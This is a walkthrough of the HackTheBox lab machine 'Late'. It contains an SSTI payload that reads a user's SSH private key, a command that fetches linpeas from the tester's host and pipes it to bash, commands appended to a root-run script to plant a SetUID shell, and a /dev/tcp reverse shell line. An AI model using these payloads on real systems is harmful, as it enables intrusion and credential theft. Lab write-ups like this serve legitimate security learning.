HackTheBox: Late Walkthrough
Late is an easy machine from HackTheBox where the attacker will have an SSTI vulnerability on an OCR application to obtain the user’s SSH private key. Finally, to become root, it will have to check a bash script being executed as root each time someone connects through SSH. But for that, it will have to check the file attributes to discover that only data can be appended to the file.
Let’s start with the first things first as always run an nmap scan on the machine. To see what ports are open and what services are running on these ports.
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-16 12:04 EDT
Nmap scan report for 10.10.11.156
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.62 seconds
We can see that there are two ports are open. 80 and 22. Let’s enumerate the web server.
In frequently asked questions, There is a subdomain “images.late.htb” now let’s add these to our host file.
echo "10.10.11.156 late.htb images.late.htb" >> /etc/hosts
The site is a simple HTML form that claims it will convert an image to text:
This site lets us convert images to text. We can upload a image and see what it gives. I used an online Text-to-Image converter to create the image.
After uploading the image, we get the extracted text.
So we know this works fine. We can test the application for common vulnerabilities like XSS, SQLi and CMDi. First we have to create the images with the payloads and upload them.
Testing for these vulnerabilities, we get a hit with a SSTI payload like {{2+2}}
Being the name of the box “Late” we can see why SSTI worked (Temp”late”). Now its confirmed that SSTI in possible here. But when we try to get RCE by uploading an image with payload like this,
<p>uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc) </p>
To get a shell from this, image the user’s SSH private key can be obtained.
{{get_flashed_messages.__globals__.__builtins__.open("/home/svc_acc/.ssh/id_rsa").read()}}
We got the key now rename it with id_rsa.
chmod 600 id_rsa
┌──(kali㉿kali)-[~/HTB/Linux/Late]
└─$ ssh -i id_rsa svc_acc@late.htb
The authenticity of host 'late.htb (10.10.11.156)' can't be established.
ED25519 key fingerprint is SHA256:LsThZBhhwN3ctG27voIMK8bWCmPJkR4iDV9eb/adDOc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'late.htb' (ED25519) to the list of known hosts.
svc_acc@late:~$
We got in. Now submit the flag and move to privilege escalation part.
Finally, to escalate privileges there is a script named ssh-alert owned by the user of this machine, with the following content.
svc_acc@late:/tmp$ curl http://10.10.14.10/linpeas.sh | bash
[..]
You own the script: /usr/local/sbin/ssh-alert.sh
svc_acc@late:~$ cat /usr/local/sbin/ssh-alert.sh
#!/bin/bash
RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"
BODY="
A SSH login was detected.
User: $PAM_USER
User IP Host: $PAM_RHOST
Service: $PAM_SERVICE
TTY: $PAM_TTY
Date: `date`
Server: `uname -a`
"
if [ ${PAM_TYPE} = "open_session" ]; then
echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi
Based on the information of the script, the script is triggered once someone logs to the machine through SSH. However, checking the file attributes we can only append text to the file, so it is not possible to edit the file.
svc_acc@late:~$ ls -la /usr/local/sbin/ssh-alert.sh
-rwxr-xr-x 1 svc_acc svc_acc 433 May 6 23:43 /usr/local/sbin/ssh-alert.sh
svc_acc@late:~$ lsattr /usr/local/sbin/ssh-alert.sh
-----a--------e--- /usr/local/sbin/ssh-alert.sh
Then, to obtain the root flag, the following one liner can be executed.
svc_acc@late:~$ echo 'cat /root/root.txt > /tmp/root2.txt' >> /usr/local/sbin/ssh-alert.sh;ssh localhost "exit"; cat /tmp/root2.txt
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:bFNeiz1CrOE5/p6XvXGfPju6CF1h3+2nsk32t8V1Yfw.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
9b1ea0ac27b770a7945748f32bb2c7ef
We can get root.txt this way too, But the box is not rooted it’s not fun. So I will find a way to be root on the box.
To exploit this, I’ll use the following line to create a SetUID Bash executable:
svc_acc@late:~$ echo -e "cp /bin/bash /tmp/.marvel\nchmod 4755 /tmp/.marvel"
cp /bin/bash /tmp/.marvel
chmod 4755 /tmp/.marvel
svc_acc@late:~$ echo -e "cp /bin/bash /tmp/.marvel\nchmod 4755 /tmp/.marvel" >> /usr/local/sbin/ssh-alert.sh
Now I’ll log in over SSH as svc_acc, and there’s .0xdf owned by root with the SetUID bit on:
svc_acc@late:~$ ls -l /tmp/.marvel
-rwsr-xr-x 1 root root 1113504 Jul 25 21:12 /tmp/.marvel
I’ll run with -p to not drop privileges and get a root shell:
There are other way to get root on the box, We can append a reverse shell and get a reverse shell as root too. We can try that way too.
echo 'bash -i >& /dev/tcp/10.10.14.10/9091 0>&1' >> /usr/local/sbin/ssh-alert.sh
Stay tuned, For next machine.